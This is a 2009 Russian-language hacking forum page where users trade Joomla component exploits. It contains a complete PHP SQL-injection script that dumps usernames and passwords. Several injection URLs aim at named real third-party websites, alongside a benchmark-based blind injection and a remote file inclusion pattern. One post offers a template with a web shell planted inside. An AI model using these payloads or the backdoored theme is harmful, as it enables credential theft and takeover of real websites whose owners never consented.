ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 08.08.2009, 12:19
Аватар для swt1
swt1
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466

Репутация: 96
По умолчанию

Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit

PHP код:
<?php

/*
--------------------------

Joomla <=1.0.15 Component com_pms <=2.0.4  (Ignore-List) SQl-Injection Vuln

--------------------------

Author: M4dhead

Vulnerable joomla component : com_pms

Conditions        : magic_quotes_gpc = On or Off it doesn't matter ;)

--------------------------

PREPARATION:
--------------------------
You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:


Community Builder Suite 1.1.0:
http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html

PMS enhanced Version 2.0.4 J 1.0
http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214


Install Joomla 1.0.15
Install Community Builder
Install PMS Enhanced
    Activate the Ignorlist in Components->PMS Enhanced->Config
    Tab: Backend -> Ingorlist: Yes


Create a valid User on the target Joomla 1.0.15 System with Community Builder,
login and copy the cookieinformation into the $cookie var below,
adjust the User-Agent on your Post Header dependent on your Browser.


Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
because the cookie-name is dependent on your browser.
--------------------------

USAGE:
--------------------------
Run this script! If there's not shown a page that prompt you to login, the attack was successful.
Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
and you will see some username and passwords in the selectbox :-)

Have fun!!

----------------------------------------------------
*/


$host "localhost"//your target Joomla Site
$cookie "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"//replace this with your own cookie values
$useragent "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";

//NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
//because the cookie-name is dependent on your browser.

//Don't change anything below
$path "/joomla/index.php?option=com_pms&Itemid=&page=ignore"//dont change this
$data_to_send "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"//you don't have to change this


print_r($post PostToHost($host$path$cookie$data_to_send$useragent));



function 
PostToHost($host$path$cookie$data_to_send$useragent) {
  
$fp fsockopen($host80);
  
fputs($fp"POST $path HTTP/1.1\r\n");
  
fputs($fp"Host: $host\r\n");
  
fputs($fp"User-Agent: $useragent");
  
fputs($fp"Cookie: $cookie\r\n");
  
fputs($fp"Content-type: application/x-www-form-urlencoded\r\n");
  
fputs($fp"Content-length: "strlen($data_to_send) ."\r\n");
  
fputs($fp"Connection: close\r\n\r\n");
  
fputs($fp$data_to_send);
  while(!
feof($fp)) {
      
$res .= fgets($fp128);
  }
  
fclose($fp);

  return 
$res;
}

?>
# milw0rm.com [2009-08-07]
 
Ответить с цитированием

COM_SOBI2
  #152  
Старый 10.08.2009, 12:04
Аватар для FAQ666
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию COM_SOBI2

COM_SOBI2
SQL INJECTION
http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
Проверял только на Joomla_1.0.x

Код:
index.php?option=com_sobi2&sobi2Task=search&Itemid=26
benchmark

в поле поиск вводить
Код:
')and+benchmark(10000000,benchmark(10000000,md5(now())))# a
Обязательно удалить все пробелы
и нажимать поиск)

Последний раз редактировалось FAQ666; 10.08.2009 в 13:28..
 
Ответить с цитированием

Уязвимости компонентов Joomla/Mambo
  #153  
Старый 10.09.2009, 04:10
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию Уязвимости компонентов Joomla/Mambo

Уязвимость: SQL-Inj
Компонент: The Publications
Уязвимость в файле publications.php
Уязвимый код:
PHP код:
$query "SELECT * FROM #__content WHERE catid=$id  ORDER BY title DESC"
Пример:
Код:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #154  
Старый 11.09.2009, 15:57
Аватар для Nelzone
Nelzone
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
Провел на форуме:
4700216

Репутация: 261
По умолчанию

Эксплоиты SQL-инъекции в компонентах Joomla

На веб-сайте PacketStorm, посвященному компьютерной безопасности, было опубликовано сразу 7 эксплоитов с демонстрацией SQL-инъекции в дополнительных компонентах популярной системы управления контентом Joomla. Эксплоиты относятся к следующим компонентам системы: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg и com_bfsurvey_profree.

Joomla Speech (эксплоит)
Joomla Press Release (эксплоит)
Joomla Media Alert (эксплоит)
Joomla Joomloc (эксплоит)
Joomla LucyGames (эксплоит)
Joomla TPDugg (эксплоит)
Joomla BF Survey Pro Free (эксплоит)
 
Ответить с цитированием

  #155  
Старый 11.09.2009, 20:53
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Уязвимость: SQL-Inj
Компонент: Jeporter
Версия: 2.0
Уязвимость в файле jeporter.php
Уязвимый код:
PHP код:
    $cid mosGetParam$_REQUEST'cid'false);

$sql "SELECT * FROM #__jeporter WHERE id= ".$cid;
        
$database->setQuery$sql );
        
$report NULL;
        
$database->loadObject$report );

        
$cid $report->id;
        
$title $report->title;
        
$jquery $report->jquery;
    
$sql "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
    
$database->setQuery$sql);
    
$rows $database->loadObjectList(); 
Пример:
Код:
http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users--
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #156  
Старый 12.09.2009, 22:51
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Мож кому пригодится... Тема с шеллом внутри..
после усьановки темы шелл будет в http://site.name/templates/jd_lagoon/ads.php

http://depositfiles.com/files/lhtkdh0m1

Последний раз редактировалось Zitt; 15.09.2009 в 18:31..
 
Ответить с цитированием

  #157  
Старый 13.09.2009, 01:56
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Уязвимость: Blind SQL-Inj
Компонент: com_clan_members
Версия: 0.9.2.2b
Уязвимость в файле clan_members.html.php
Уязвимый код:
PHP код:
$database->setQuery("SELECT * FROM #__clan_members WHERE id = $id"  );
$member $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'"  );
$usersdata $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id);
$rowsquadperuser $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id);
$rowmembercomment $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
$rowmemberfields $database -> loadObjectList();
#Check if the user is logged in into the side
$database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
$online $database->loadResult();
foreach(
$rowsquadperuser as $squadperuser)
    {
        
$database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'"  );
        
$squadname $database -> loadAssocList();
        if(
$squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '')
        {
        
$squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
        if(
$i == 0$squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"];
        
$i++;
        }
    } 
Пример:
true ->
Код:
http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
false ->
Код:
http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #158  
Старый 14.09.2009, 15:15
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Уязвимость: RFI
Компонент: UH_Events
Версия: 0.99.0RC3a
Уязвимость в файле admin.uhevents.php
Требования: register_globals & allow_url_fopen = On
Уязвимый код:
PHP код:
require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php"); 
Эксплойт:
Код:
.../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #159  
Старый 27.09.2009, 16:53
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Уязвимость: SQL
Компонент: Projects
Случайно наткнулся)
Код:
?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Пример:

http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION +SELECT+1,2,CONCAT_WS(0x3a,Version(),Database(),Us er()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28--

Сюда же
Уязвимость: SQL
Компонент: com_nodes
Код:
?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal
http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+ select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal

Последний раз редактировалось Dimi4; 27.09.2009 в 17:02..
 
Ответить с цитированием

  #160  
Старый 20.10.2009, 14:24
Аватар для Rashid
Rashid
Познающий
Регистрация: 31.01.2008
Сообщений: 46
Провел на форуме:
124111

Репутация: 8
По умолчанию

Сканер уязвимостей для Joomla

http://sourceforge.net/projects/joomscan/
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
Cms Cawabunga PHP, PERL, MySQL, JavaScript 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ